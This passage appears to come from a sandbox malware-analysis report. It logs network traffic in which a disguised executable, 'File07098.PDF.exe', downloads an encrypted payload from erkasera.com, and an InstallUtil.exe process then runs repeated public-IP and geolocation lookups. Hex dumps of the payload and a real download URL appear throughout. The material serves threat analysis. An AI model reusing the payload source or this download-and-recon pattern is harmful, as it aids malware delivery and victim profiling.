                                                      Oct 30, 2024 07:57:59.778089046 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: d5c3b35f640cb6647678fefc0494ac21
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.549790193.122.130.0806204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:58:00.548480034 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:01.220374107 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:01 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 3b86ad31a155711f9589077a3dc24dbc
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.549798193.122.130.0806204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:58:02.008085012 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:02.867974997 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:02 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 45550270ca009c38ddb7ba706e6c0f39
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.549810193.122.130.0806204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:58:03.662055016 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:04.333045006 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: b96d18a4828d846cdb97348c97d22cf2
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.549821193.122.130.0806204C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 30, 2024 07:58:05.133903027 CET151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Oct 30, 2024 07:58:05.967027903 CET323INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 106
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      X-Request-ID: 7c32d433eb623386502d5d8a6df729db
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549704188.132.193.464434124C:\Users\user\Desktop\File07098.PDF.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:32 UTC83OUTGET /seuias/Mccudidikm.vdf HTTP/1.1
                                                      Host: erkasera.com
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:32 UTC207INHTTP/1.1 200 OK
                                                      Connection: close
                                                      content-type: application/octet-stream
                                                      last-modified: Tue, 29 Oct 2024 08:54:25 GMT
                                                      accept-ranges: bytes
                                                      content-length: 951304
                                                      date: Wed, 30 Oct 2024 06:57:11 GMT
                                                      2024-10-30 06:57:32 UTC16384INData Raw: bd b4 d8 36 9a 60 6e 4c fa 9f c2 b9 11 00 9c bd 36 04 29 9d be 12 34 39 0e e0 74 c7 b3 e8 20 ab e4 d2 47 d1 02 74 d6 ac 64 6f 00 a8 7f 4c 70 45 c9 5c fe ff 79 9f 4b e6 35 1f aa c6 e2 10 0a 8c 57 9a f2 2f d4 3a d5 ab 13 19 0b 07 87 51 a7 c0 7c 0b 48 83 c9 c6 0c 77 68 91 db 67 e6 f3 a6 7f 87 cd cb 74 ee 33 39 50 7c 26 37 06 a9 cb 6c 1b a2 40 05 5a 71 4c e2 76 3a 2a 1a 7d 08 8c a2 77 58 81 cd 48 2d 3c e5 6d a2 61 95 90 68 9e 8f 01 10 77 2c 9c e5 49 b0 69 64 56 dc 58 d9 84 f4 fb b1 8a e0 c5 29 4c 82 28 19 c7 b3 02 6e 43 4b b0 c6 23 4d 01 fe 20 94 dc cb 0d 30 cf b3 1e 82 cf f0 97 62 96 b5 ba f4 a9 ee 1f 00 a3 07 5a 25 df ff 00 cd d8 9c 38 49 39 91 bb c6 85 9b cd 75 3c 6f 4e 96 39 31 ec b8 4d 61 d6 a8 9a 75 15 c9 cb 17 bc ea 4b b7 83 85 00 ec e0 33 d2 67 66 fa
                                                      Data Ascii: 6`nL6)49t GtdoLpE\yK5W/:Q|Hwhgt39P|&7l@ZqLv:*}wXH-<mahw,IidVX)L(nCK#M 0bZ%8I9u<oN91MauK3gf
                                                      2024-10-30 06:57:32 UTC16384INData Raw: 14 3c 60 7e 0a 18 48 44 e1 b0 a6 c0 2a 41 d0 a4 ee 2f 06 8b 4a f1 3e 22 e3 18 32 a9 b6 7f 70 32 d8 eb 9d 80 82 70 ca 68 e0 12 ab ad 72 51 9a f0 6b aa f3 72 f8 2e 57 ef f6 36 9c fd 95 a1 57 33 9e 28 ca e9 01 47 0f 1c 00 dd 10 25 a3 6c 7c 89 10 7f 0b 53 85 a0 93 da 6f 22 dd 48 c8 92 29 50 2e 20 f7 4a 6a 51 f5 12 75 a9 43 26 04 ac 95 e9 59 e7 28 cf 3a e6 5a e8 1e 9e c6 c7 e6 bb dc d6 73 7d 31 da d1 d2 64 44 bc 3f d2 4b 58 49 2b dd 7c d2 1a 77 bf 9c 0b 6b 1a 18 b0 61 e3 94 f6 80 da a5 79 41 09 68 a5 d8 16 02 65 5c ff c3 11 2a 6e e9 e2 a2 10 af 44 52 09 f2 63 b0 87 10 7a 5f ca b4 df 72 0f 4e ad e8 68 10 3d 7d 3d cf 05 8b 03 cc 4f ea a3 d7 1d 52 d9 37 62 bb 29 c2 91 4e 96 7c 08 fa 19 03 47 80 63 0a c0 9a 06 a8 4c bb 1b 75 34 82 81 55 08 ab 06 91 7e 93 48 e3 3a
                                                      Data Ascii: <`~HD*A/J>"2p2phrQkr.W6W3(G%l|So"H)P. JjQuC&Y(:Zs}1dD?KXI+|wkayAhe\*nDRcz_rNh=}=OR7b)N|GcLu4U~H:
                                                      2024-10-30 06:57:32 UTC16384INData Raw: e7 34 29 34 13 20 80 8c 0e 1a 09 4f 14 26 32 21 40 db 28 5c e8 bf 03 98 3c fb 14 db d9 41 c9 7c 08 9f 9d 83 cb 21 53 83 10 46 5a 0c b1 f1 13 40 d8 12 1e 32 cd 17 28 a3 44 70 be cc c1 af 54 82 80 8c bc dd f4 c8 a9 91 f3 18 f9 a6 81 ec 4e 9c a9 d3 a7 de e2 30 db ea 1d e6 d7 4b af 3d b5 af 1d c1 af f1 d1 8b 3b 8e d6 83 51 66 f2 42 52 18 ad 4d ec 67 a6 64 93 8b b6 60 49 4b e5 32 5c 5f db 5c c2 09 89 63 0e a5 67 0e 1d 0a 3c 0e 0e c1 a1 cc 28 52 51 b4 b1 24 e5 cb 9c 77 53 55 d0 0c 64 46 83 5b d2 bf ce 2a 69 db b5 86 22 91 3f 94 1c 1f 40 6e 65 6d 7c fe 66 bf 2b 0f e7 08 3c d5 ab b5 f9 ac de 99 97 3c bc e6 c9 6b 03 bb 03 5a ee 99 7c 99 d3 78 7d 96 68 7a 95 36 b9 fa 75 40 81 75 b6 26 77 50 0a 09 35 15 c2 3c 80 42 d9 80 10 d3 ac 73 71 3e b0 51 38 b4 4d 60 21 df ff
                                                      Data Ascii: 4)4 O&2!@(\<A|!SFZ@2(DpTN0K=;QfBRMgd`IK2\_\cg<(RQ$wSUdF[*i"?@nem|f+<<kZ|x}hz6u@u&wP5<Bsq>Q8M`!
                                                      2024-10-30 06:57:32 UTC16384INData Raw: 1b 86 71 54 2e ce e8 40 0b 33 c7 cb f8 94 61 d6 28 bf 18 f8 9d 64 6b a9 de 4c aa e9 bd 62 1a d1 c7 57 46 e5 27 ce c7 af fc c7 7c 0e ab 09 de 6b c7 89 8a ce b1 61 fa 92 08 b8 19 47 60 38 e3 54 c4 4f 65 2a ba 2b 19 e4 06 83 4f df de 06 13 1d 12 0f 91 13 3b 21 21 c4 5a 74 70 30 21 20 d3 21 48 c7 2b 01 4b b0 76 09 bd 01 77 4f 66 dd 0e 49 1b 26 3d e8 eb c7 7d 26 37 d8 7f c4 6b 9d 43 aa 46 6b c4 6f e2 98 32 4e f2 de eb ca d2 09 a3 d9 42 45 19 c0 9f 3b f8 40 23 ab 20 4a ce af 58 3a 54 26 43 78 7f f5 84 f9 ca 45 c9 2a ac be b4 9d f6 be 8d b5 24 dd d6 8e 6d ea 40 6b 9d 5a a3 34 6e 61 c8 dd cc d3 2f 65 e5 b7 4e 3a 24 b0 06 24 09 ea 97 93 2f 5f 10 37 0d ef bd fe 09 4d dc cd 8b 59 ec de f3 c2 e8 e3 7a 53 3f 04 57 a1 c3 2d d6 5f 36 3c d6 cd c7 70 b1 3b 67 02 7c ac a4
                                                      Data Ascii: qT.@3a(dkLbWF'|kaG`8TOe*+O;!!Ztp0! !H+KvwOfI&=}&7kCFko2NBE;@# JX:T&CxE*$m@kZ4na/eN:$$/_7MYzS?W-_6<p;g|
                                                      2024-10-30 06:57:33 UTC16384INData Raw: 9e 0a 63 90 52 c3 c3 6b 64 a7 c1 97 60 7b cf c8 ec 5f dd d2 50 59 29 6a d2 0b a6 12 5d 17 ff 34 ab 85 82 c0 30 7f 35 8d 54 ff 0b 86 40 98 a7 e2 e9 02 01 f1 29 ba 50 e5 a1 72 ff 30 5b 9d 8e 4d 33 50 56 be 6c d9 7e 1e d0 fe a1 81 50 c8 cb 12 5e 08 31 17 99 0f 15 78 d2 2f 10 0e 18 2d da b0 1d 8e 89 2f 9c 38 0c f8 88 58 38 cb 53 19 97 16 de d0 46 93 09 1c 2d 5a 90 0d 42 f5 17 20 3f ff 62 25 2a d8 18 d3 de eb c6 6f f1 e1 ec c7 22 dc 89 d7 4e fa 86 e5 74 c0 76 2e 60 92 52 a0 18 5a 19 a7 89 ee 2b 90 9e 55 1e c2 fd 35 7d d7 81 99 79 50 42 53 bb cf 96 2b 5c 76 26 66 27 59 dd 4f a3 7f 1f d1 de 26 4e 6e 89 cb a9 19 9b c5 a0 52 e1 b7 1f 03 99 2b 29 fb b7 89 6a ed c5 2f 92 f8 b1 96 c9 34 2d 66 4a bd 3c e4 1b 81 db a6 1b e2 54 c1 1d d8 94 c9 5f 65 4c 08 69 47 48 14 96
                                                      Data Ascii: cRkd`{_PY)j]405T@)Pr0[M3PVl~P^1x/-/8X8SF-ZB ?b%*o"Ntv.`RZ+U5}yPBS+\v&f'YO&NnR+)j/4-fJ<T_eLiGH
                                                      2024-10-30 06:57:33 UTC16384INData Raw: da f3 81 5f 19 16 34 7e cd 24 97 f5 27 f5 26 d1 02 78 a6 4c 80 8f fb 36 4c 17 33 cd 85 65 10 1b 36 ee 74 f4 c6 10 df c5 47 be fb 41 c7 b2 18 90 f0 b7 0e 7f a1 d9 b6 a2 6b 1b f2 f0 a1 0c 13 f5 81 94 53 03 c4 31 62 d0 c5 ae 48 e6 27 62 a2 46 cd 04 4e c4 f1 27 29 52 15 43 37 1e 17 cb 1d 3b b2 52 45 d7 73 51 17 67 7e b4 10 52 7c dc dc 5c c7 2d 76 80 10 fe 95 42 98 39 14 c1 44 a9 14 bb 8e 9e ae 39 73 a2 f9 47 78 5e 53 22 96 f9 ea 7c cd 69 9a f8 ac 40 f4 f5 48 57 fe 7a 01 2d d9 53 7b 35 38 d4 20 b6 42 25 7d a7 ad f7 72 a1 34 7c 0b b7 5d 81 4c e3 20 2d 16 9e b1 63 cd 70 14 4b 76 34 a9 c3 1e 64 ee e2 b6 25 71 80 08 c4 57 02 b2 12 46 07 e3 6d 7f cc 9f 12 c3 cd 7d cc a3 ca 30 77 0d 73 67 92 04 85 e6 16 82 74 fb 39 ce f5 d1 9f d1 b5 c5 a1 e6 01 fa f2 cb a9 23 31 1c
                                                      Data Ascii: _4~$'&xL6L3e6tGAkS1bH'bFN')RC7;REsQg~R|\-vB9D9sGx^S"|i@HWz-S{58 B%}r4|]L -cpKv4d%qWFm}0wsgt9#1
                                                      2024-10-30 06:57:33 UTC16384INData Raw: c4 08 56 4f ed 2f 81 b0 d6 83 9c a3 00 06 aa eb 2d 68 83 8e 16 cc 47 7e 5f ca 1e 51 19 0f b5 56 5b 6b ff b9 27 41 82 dc 7e ba bb d9 da 32 d4 d9 58 8d 33 15 27 f0 b6 34 7b cb 28 9b 90 b9 af 0c ce 2e 08 4c 8d dc f8 ea 15 5e 2a f4 f7 a6 aa 49 a5 76 a2 c2 55 56 e2 46 dd 85 43 69 35 9b 0b 15 5e af 40 a5 2b 25 32 35 ed e2 f9 af 9e df 83 34 c6 af 6a 7f f5 c9 cd bb 1c 1b 56 9c fa 96 ed 41 21 2f 0d 5d ab 19 9e 9a 9b da b6 46 4e 78 cd d7 dc 0d 12 af ad d2 f7 dc 6b a8 b2 5e 1a 50 43 d5 94 22 02 9f f7 91 1c 47 07 41 c3 e4 a7 78 bb 94 37 0d e9 0c 00 53 68 ef 61 80 25 f2 8a 46 ff 09 51 21 82 1e 81 ea c4 aa 96 b1 a6 e8 89 f4 a3 67 38 ca 7f e7 06 6e 08 8b 02 5b d2 3d 89 c9 db 54 a3 e4 00 95 e1 40 58 df 1c d8 36 39 b1 a9 b0 d4 cf dd 3b be 6e 56 bd 7a 20 5e 04 0c 74 3a ff
                                                      Data Ascii: VO/-hG~_QV[k'A~2X3'4{(.L^*IvUVFCi5^@+%254jVA!/]FNxk^PC"GAx7Sha%FQ!g8n[=T@X69;nVz ^t:
                                                      2024-10-30 06:57:33 UTC16384INData Raw: 79 54 70 a7 cf 4c 0a f4 56 3a 2f 52 e2 6e a5 09 a1 ac e4 27 81 48 8a e4 aa 06 ab 13 47 56 df 98 4c ca 12 9f a9 6f 0c 75 81 11 83 7f 51 e4 e3 64 3e 9f f1 c3 33 9e 54 59 b2 9c 8b e7 be e3 7a 18 6e 4a bd 1c 10 be d2 d2 a5 21 68 25 be e5 a5 04 8c 6b 1a 4d 3e 42 1d f1 9e 38 1d 73 b3 1b 77 8c 79 37 2d 94 b6 e5 74 bf 97 19 01 28 cd 0c 5a a9 4a 5b 9b 20 20 99 91 91 83 35 0d 3f 5b 49 66 e2 81 f9 86 c7 5a 75 24 07 86 cb d0 09 1c d0 a0 2f 78 9a b2 0c 36 b8 57 6e b7 86 d7 d7 a5 c0 10 6a b5 e0 bf 9b 29 72 13 bc ac de f8 28 d5 05 d6 1d 8c 9c 84 02 b0 45 ce 7b 8d ac 23 78 73 2d 3c f4 41 9b e2 40 eb 29 d4 08 c2 cf 2d 87 93 dd 18 77 cf 4e 0d 85 bf 57 b9 c8 41 90 f7 25 b0 03 26 e4 e0 7b 79 64 00 16 4b 35 eb 62 92 51 9a 94 76 1f 85 05 b3 f3 fe 83 0e 27 36 48 d9 8c 48 53 c4
                                                      Data Ascii: yTpLV:/Rn'HGVLouQd>3TYznJ!h%kM>B8swy7-t(ZJ[ 5?[IfZu$/x6Wnj)r(E{#xs-<A@)-wNWA%&{ydK5bQv'6HHS
                                                      2024-10-30 06:57:33 UTC16384INData Raw: 9d ef 14 65 18 2a 30 63 c6 7b 09 c9 58 19 7e 7e 8a e1 65 2f 98 9d d8 5d 20 75 df 60 d4 e2 49 90 79 84 ad 2c 10 1b 41 49 84 f3 cc 70 a0 50 87 4c f5 f4 38 0e c3 19 fd 09 c2 50 0a 13 01 81 68 b0 42 70 3a ac b8 01 33 fe 33 90 57 f3 c4 0a af d9 26 d6 3f 11 fc ca 0f 25 3b be fb ea 8d 08 fe 7b bd db a5 12 96 9f 0c 35 e9 71 86 e6 54 e7 d0 06 af 92 fc c5 c6 c6 ea 78 b5 63 7f e3 5f 39 2f eb 4f 96 0c a2 f8 27 58 3d fc 47 65 05 dd 5a 81 f7 5f 7a 23 6d 41 ce 38 58 e4 9d cf f8 87 c2 ac 1e ea 5e 93 a7 95 c6 bd 09 1e 65 39 df 4c f6 f1 34 74 2b 7f 59 b5 ca 4c 56 b1 d6 15 c2 b9 76 86 10 fc 0d a1 74 1b 9f 58 8c 1f 31 85 0e f8 84 35 f8 5a b2 76 e2 26 f2 80 75 4f 44 6a 70 f5 8a 99 00 ea 9d 0d 80 67 ec 11 99 b8 83 36 85 05 56 fe 60 c0 c9 c3 54 78 15 87 b7 bc c2 98 e1 44 40 5f
                                                      Data Ascii: e*0c{X~~e/] u`Iy,AIpPL8PhBp:33W&?%;{5qTxc_9/O'X=GeZ_z#mA8X^e9L4t+YLVvtX15Zv&uODjpg6V`TxD@_
                                                      2024-10-30 06:57:33 UTC16384INData Raw: b1 47 de c3 88 b7 df 10 77 3e 63 28 e5 05 b9 55 3f 08 b0 9d 30 2a e7 b8 85 72 94 c0 53 be b4 76 91 86 92 b6 91 1d 22 81 ac 30 3b 1e cf 5c 65 19 f5 36 f5 91 56 1d d8 5d 6f d8 64 8a f5 49 19 2b 78 da 0d 09 5d 65 5d 8e 54 07 1c a7 83 aa fc 60 78 d7 fc 37 9c 1f 50 ad a9 6b a2 36 c5 2d 54 96 62 12 f2 75 64 b5 19 70 15 90 85 07 62 9e 58 62 98 ca 5f 74 ee 9d de ad 58 e8 fd ae f7 21 88 23 86 5b 63 19 11 31 bc 52 d3 c1 58 15 5c c4 98 2d 9a a5 d7 83 5e 50 58 57 1d 09 22 62 e5 87 3f a0 db 35 9f f5 2d 94 20 c1 3d d4 c1 60 43 9a 03 f6 7f 61 b9 01 98 de 64 68 1b 2a 4d 00 33 52 9d 9e bf 3b 01 17 b8 62 31 07 5e c4 09 e4 4b 53 ce a2 54 32 99 3b 79 ef 09 01 66 27 f0 88 f9 b4 24 52 18 0c a7 6b fd 91 0e 98 8d 68 68 b7 7b f7 61 84 1a 2c 2f 3a 84 e5 60 91 50 3a 59 e6 46 50 c1
                                                      Data Ascii: Gw>c(U?0*rSv"0;\e6V]odI+x]e]T`x7Pk6-TbudpbXb_tX!#[c1RX\-^PXW"b?5- =`Cadh*M3R;b1^KST2;yf'$Rkhh{a,/:`P:YFP


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549706188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:38 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:38 UTC883INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:38 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19481
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBkqO10E%2BDfSNsel934Eo8e9UI%2FWW5BPe5bywzSBo1D1OTy30CUNkooGlpB3u1HUSyGL9brH0azWyATg8v4u5kRvOc6yUaVLOJlg1RU1Dg9zhCqydVETTMzwsEh3KX8tqevXcyuu"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98325997f2cb2-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2019&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1425196&cwnd=251&unsent_bytes=0&cid=592f2d4287329531&ts=296&x=0"
                                                      2024-10-30 06:57:38 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.549707188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:39 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:57:39 UTC883INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:39 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19482
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWEYiQcOpRf3EEw8P7RYJTKEGmJFQptpQ24UwYCc3qRJ92PSF1iKOD5gFrIk1G3IqcWcFriPBDnbcOlUaF4Dv2BUnnVuvBoLBltDA0em1oahWTb%2BavhUBwUp6N%2B2svqtf3vgTOly"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9832b6b4f2cdb-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1845&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1556989&cwnd=251&unsent_bytes=0&cid=e05c2e6d3deb41bd&ts=158&x=0"
                                                      2024-10-30 06:57:39 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                      Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.549709188.114.96.34432460C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-30 06:57:40 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:40 UTC891INHTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:40 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19483
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
